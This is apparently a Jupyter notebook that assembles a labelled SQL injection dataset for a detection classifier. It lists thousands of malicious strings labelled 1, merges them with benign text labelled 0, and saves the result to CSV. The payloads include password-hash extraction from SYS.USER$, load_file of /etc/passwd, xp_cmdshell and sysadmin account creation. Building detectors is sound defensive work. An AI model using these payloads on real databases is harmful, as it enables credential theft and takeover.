 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 7  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 8  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 8  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 8  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = 8  )  )   AND 'i' = 'i",
 "' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 8  )  )   AND 'i' = 'i",
 "'|| ( elt ( -3+5,bin ( 15 ) ,ord ( 10 ) ,hex ( char ( 45  )  )    )  )  ",
 '||6',
 "'||'6",
 ' ( ||6 ) ',
 "' or 1 = 1-- ",
 'or 1 = 1',
 "' or '1' = '1",
 "; or '1' = '1'",
 '" or isNULL ( 1/0 )  /*',
 "' or '7659' = '7659",
 '" or isNULL ( 1/0 )  /*',
 "' -- ",
 "' or 1 = 1--",
 '" or 1 = 1--',
 "' or 1 = 1 /*",
 'or 1 = 1--',
 "' or 'a' = 'a",
 '" or "a" = "a',
 "' )  or  ( 'a' = 'a",
 "admin' or '",
 "' select * from information_schema.tables--",
 ' )  union select * from information_schema.tables;',
 "' having 1 = 1--",
 "' having 1 = 1--",
 "' group by userid having 1 = 1--",
 "' select name from syscolumns where id  =   ( select id from sysobjects where name  =  tablename' ) --",
 "' or 1 in  ( select @@version ) --",
 "' union all select @@version--",
 "' or 'unusual'  =  'unusual'",
 "' or 'something'  =  'some'+'thing'",
 "' or 'text'  =  n'text'",
 "' or 'something' like 'some%'",
 "' or 2 > 1",
 "' or 'text' > 't'",
 "' or 'whatever' in  ( 'whatever' ) ",
 "' or 2 between 1 and 3",
 "' or username like char ( 37 ) ;",
 "' union select * from users where login  =  char ( 114,111,111,116 ) ;",
 "' union select ",
 'password:*/ = 1--',
 'uni/**/on sel/**/ect',
 "'; execute immediate 'sel' || 'ect us' || 'er'",
 "'; exec  ( 'sel' + 'ect us' + 'er' ) ",
 "'/**/or/**/1/**/ = /**/1",
 "' or 1/*",
 ' or isNULL ( 1/0 )  /*',
 "' or '7659' = '7659",
 '" or isNULL ( 1/0 )  /*',
 "' -- &password = ",
 "'; begin declare @var varchar ( 8000 )  set @var = ':' select @var = @var+'+login+'/'+password+' ' from users where login > ",
 '@var select @var as var into temp end --',
 "' and 1 in  ( select var from temp ) --",
 "' union select 1,load_file ( '/etc/passwd' ) ,1,1,1;",
 '1; ( load_file ( char ( 47,101,116,99,47,112,97,115,115,119,100  )  )   ) ,1,1,1;',
 "' and 1 =  (  if  (  (  load_file ( char ( 110,46,101,120,116  )  )  <>char ( 39,39  )  )  ,1,0  )  )  ;",
 "'; exec master..xp_cmdshell 'ping 10.10.1.2'--",
 "create user name identified by 'pass123'",
 'create user name identified by pass123 temporary tablespace temp default tablespace users; ',
 "' ; drop table temp --",
 "exec sp_addlogin 'name' , 'password'",
 "exec sp_addsrvrolemember 'name' , 'sysadmin'",
 "insert into mysql.user  ( user, host, password )  values  ( 'name', 'localhost', password ( 'pass123'  )  )  ",
 'grant connect to name; grant resource to name;',
 'insert into users ( login, password, level )  values (  char ( 0x70 )  + char ( 0x65 )  + char ( 0x74 )  + char ( 0x65 )  + char ( 0x72 )  + char ( 0x70 )  + char ( 0x65 )  + char ( 0x74 )  + char ( 0x65 )  + char ( 0x72 ) ,char ( 0x64 ) ',
 "' or 1 = 1 --",
 "' union  ( select @@version )  --",
 "' union  ( select NULL,  ( select @@version  )  )   --",
 "' union  ( select NULL, NULL,  ( select @@version  )  )   --",
 "' union  ( select NULL, NULL, NULL,   ( select @@version  )  )   --",
 "' union  ( select NULL, NULL, NULL, NULL,   ( select @@version  )  )   --",
 "' union  ( select NULL, NULL, NULL, NULL,  NULL,  ( select @@version  )  )   --",
 "'; if not ( substring  (  (  select @@version ) ,25,1 )  <> 0 )  waitfor delay '0:0:2' --",
 "'; if not ( substring  (  (  select @@version ) ,25,1 )  <> 5 )  waitfor delay '0:0:2' --",
 "'; if not ( substring  (  (  select @@version ) ,25,1 )  <> 8 )  waitfor delay '0:0:2' --",
 "'; if not ( substring  (  (  select @@version ) ,24,1 )  <> 1 )  waitfor delay '0:0:2' --",
 "'; if not ( select system_user )  <> 'sa' waitfor delay '0:0:2' --",
 "'; if is_srvrolemember ( 'sysadmin' )  > 0 waitfor delay '0:0:2' -- ",
 "'; if not  (  (  select serverproperty ( 'isintegratedsecurityonly'  )  )   <> 1 )  waitfor delay '0:0:2' --",
 "'; if not  (  (  select serverproperty ( 'isintegratedsecurityonly'  )  )   <> 0 )  waitfor delay '0:0:2' --",
 '& (  ) o1: select * from users where id = 1 or  ( \\ )  = 1 union select 1,@@VERSION -- 1',
 '& ( . ) o: select * from users where id = 1 or  ( \\. )  = 1 union select 1,@@VERSION -- 1',
 '& ( 1&1: select * from users where id = 1 or  ( \\+ )  = 1 or 1 = 1 -- 1',
 '& ( 1 ) o: select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1',
 '& ( 1UE: select * from users where id = 1 or  ( \\+ )  = 1 union select 1,@@VERSION -- 1',
 '& ( n&1: select * from users where id = 1 or  ( $+ )  = 1 or 1 = 1 -- 1',
 '& ( nUE: select * from users where id = 1 or  ( $+ )  = 1 union select 1,@@VERSION -- 1',
 '&.o&1: select * from users where id = 1 or \\.<\\ or 1 = 1 -- 1',
 '&.o1&: select * from users where id = 1 or \\.<1 or 1 = 1 -- 1',
 '&.o1U: select * from users where id = 1 or \\.<1 union select 1,@@VERSION -- 1',
 '&.oUE: select * from users where id = 1 or \\.<\\ union select 1,@@VERSION -- 1',
 '&.on&: select * from users where id = 1 or \\.<$ or 1 = 1 -- 1',
 '&.onU: select * from users where id = 1 or \\.<$ union select 1,@@VERSION -- 1',
 '&.oo1: select * from users where id = 1 or \\.<  = 1 union select 1,@@VERSION -- 1',
 '&1UE1: select * from users where id = 1 ||1 union select 1,banner from v$version where rownum = 1 -- 1',
 '&1UEv: select * from users where id = 1 ||1 union select null,banner from v$version where rownum = 1 -- 1',
 '&1c: select * from users where id = 1   or 1 = 1 -- 1',
 '&1oo&: select * from users where id = 1 or \\+<\\ or 1 = 1 -- 1',
 '&1oo1: select * from users where id = 1 or  1<@ = 1 union select 1,version (  )  -- 1',
 '&1ooU: select * from users where id = 1 or \\+<\\ union select 1,@@VERSION -- 1',
 '&1oon: select * from users where id = 1 or \\+<$ union select 1,@@VERSION -- 1',
 '&1ovc: select * from users where id = 1 or 1&@# = 1 union select 1,version (  )  -- 1',
 '&n.o1: select * from users where id = 1 or $ . = 1 union select 1,@@VERSION -- 1',
 '&n1&1: select * from users where id = 1 or $ 1 = 1 or 1 = 1 -- 1',
 '&n1UE: select * from users where id = 1 or $ 1 = 1 union select 1,@@VERSION -- 1',
 '&no&1: select * from users where id = 1 or $<\\ or 1 = 1 -- 1',
 '&no.&: select * from users where id = 1 or $<\\. or 1 = 1 -- 1',
 '&no.U: select * from users where id = 1 or $<\\. union select 1,@@VERSION -- 1',
 '&noUE: select * from users where id = 1 or $<\\ union select 1,@@VERSION -- 1',
 '&noo&: select * from users where id = 1 or $+<\\ or 1 = 1 -- 1',
 '&noo1: select * from users where id = 1 or $+<1 union select 1,@@VERSION -- 1',
 '&nooU: select * from users where id = 1 or $+<\\ union select 1,@@VERSION -- 1',
 '&noon: select * from users where id = 1 or $+<$ union select 1,@@VERSION -- 1',
 '&o.&1: select * from users where id = 1 or \\<\\. or 1 = 1 -- 1',
 '&o.UE: select * from users where id = 1 or \\<\\. union select 1,@@VERSION -- 1',
 '&o1&1: select * from users where id = 1 or \\<1 or 1 = 1 -- 1',
 '&o1UE: select * from users where id = 1 or \\<1 union select 1,@@VERSION -- 1',
 '&oUE1: select * from users where id = 1 or \\<\\ union select 1,@@VERSION -- 1',
 '&oUEv: select * from users where id = 1 or \\<\\ union select null,@@VERSION -- 1',
 '&on&1: select * from users where id = 1 or \\<$ or 1 = 1 -- 1',
 '&onUE: select * from users where id = 1 or \\<$ union select 1,@@VERSION -- 1',
 '&oo1&: select * from users where id = 1 or \\<  = 1 or 1 = 1 -- 1',
 '&oo1U: select * from users where id = 1 or \\<  = 1 union select 1,@@VERSION -- 1',
 '&ov&1: select * from users where id = 1 or !<@ or 1 = 1 -- 1',
 '&ovUE: select * from users where id = 1 or !<@ union select 1,version (  )  -- 1',
 '&v: select * from users where id = 1 or @`\\` union select 1,version (  )  -- 1',
 '&vc: select * from users where id = 1 or  @$# = 1 union select 1,version (  )  -- 1',
 '&voo1: select * from users where id = 1 or @<@ = 1 union select 1,version (  )  -- 1',
 ' ) &1c: select * from users where id = 1 + ( \\ )  or 1 = 1 -- 1',
 ' ) UEvc: select * from users where id = 1 + ( \\ )  union select null,@@VERSION -- 1',
 '.&1UE: select * from users where id = 1.&&1 union select 1,version (  )  -- 1',
 '.&1c: select * from users where id = 1. or 1 = 1 -- 1',
 '.&vUE: select * from users where id = 1.&&@ union select 1,version (  )  -- 1',
 '. ) &1c: select * from users where id = 1 +  ( \\. )  or 1 = 1 -- 1',
 '. ) UEv: select * from users where id = 1 +  ( \\. )  union select null,@@VERSION -- 1',
 '.UE1,: select * from users where id = 1.  union select 1,version (  )  -- 1',
 '.UE1k: select * from users where id = 1. union select 1,banner from v$version where rownum = 1 -- 1',
 '.UEf ( : select * from users where id = 1.  union select version (  ) ,version (  )  -- 1',
 '.UEv,: select * from users where id = 1. union select null,version (  )  -- 1',
 '.UEvc: select * from users where id = 1 +\\. union select null,@@VERSION -- 1',
 '.UEvk: select * from users where id = 1. union select null,banner from v$version where rownum = 1 -- 1',
 '.o&1c: select * from users where id = 1. <@ or 1 = 1 -- 1',
 '.o.&1: select * from users where id = 1.<@. or 1 = 1 -- 1',
 '.o.UE: select * from users where id = 1.<@. union select 1,version (  )  -- 1',
 '.o1&1: select * from users where id = 1.*1 or 1 = 1 -- 1',
 '.o1UE: select * from users where id = 1.*1 union select 1,banner from v$version where rownum = 1 -- 1',
 '.o1c: select * from users where id = 1.<1# union select 1,version (  )  -- 1',
 '.oUE1: select * from users where id = 1. <@ union select 1,version (  )  -- 1',
 '.oUEf: select * from users where id = 1. <@ union select version (  ) ,version (  )  -- 1',
 '.oUEv: select * from users where id = 1.*\\ union select null,@@VERSION -- 1',

In [169]:
#adding labels to sqli dataset (1)
dataset=[]
for i in all_sqli_sentences:
    dataset.append((i,1))

In [170]:
len(dataset)

14457

Combination of SuperPowers_legit and SCott_park benign data (normal data)

In [171]:
#adding labels to benign dataset (0)
for i in data:
    dataset.append((i,0))

In [172]:
for i in SuperPowers_legit:
    dataset.append((i,0))

In [173]:
dataset[4400:4420]

[('"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "vRlU" = "vRlU',
  1),
 ('"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "Wsle" = "Wsle',
  1),
 ('"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "FySY" = "FySY',
  1),
 ('"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "WgQt" = "WgQt',
  1),
 ('" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "qNyI" = "qNyI',
  1),
 ('" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "iDBL" = "iDBL',
  1),
 ('" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "oPpm" = "oPpm',
  1),
 ('" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "EXkT" = "EXkT',
  1),
 ('" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "xkGT" = "xkGT',
  1),
 ('" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "ZSwK" = "ZSwK',
  1),
 ('" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "HIdp" = "HIdp',
  1),
 ('" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "fasg" = "fasg',
  1),
 ('" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "VSAm" = "VSAm',
  1),
 ('" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Guws" = "Guws',
  1),
 ('" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "MbiD" LIKE "MbiD',
  1),
 ('" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "yWBx" LIKE "yWBx',
  1),
 ('" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "kxly" LIKE "kxly',
  1),
 ('" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "YGBA" LIKE "YGBA',
  1),
 ('" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "HKAT" LIKE "HKAT',
  1),
 ('" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "bNgY" LIKE "bNgY',
  1)]

In [174]:
print(len(dataset))

18900

In [175]:
df= pd.DataFrame(dataset, columns=['sentence','type'])

In [176]:
df.to_csv(r'./dataset/myOwnDataset/myDataset.csv', index=False, encoding='utf-16')

In [177]:
df.head()

          sentence  type
0                a     1
1              a'      1
2            a' --     1
3  a' or 1 = 1; --     1
4                @     1

In [178]:
print(df['type'].value_counts())

1    14457
0     4443
Name: type, dtype: int64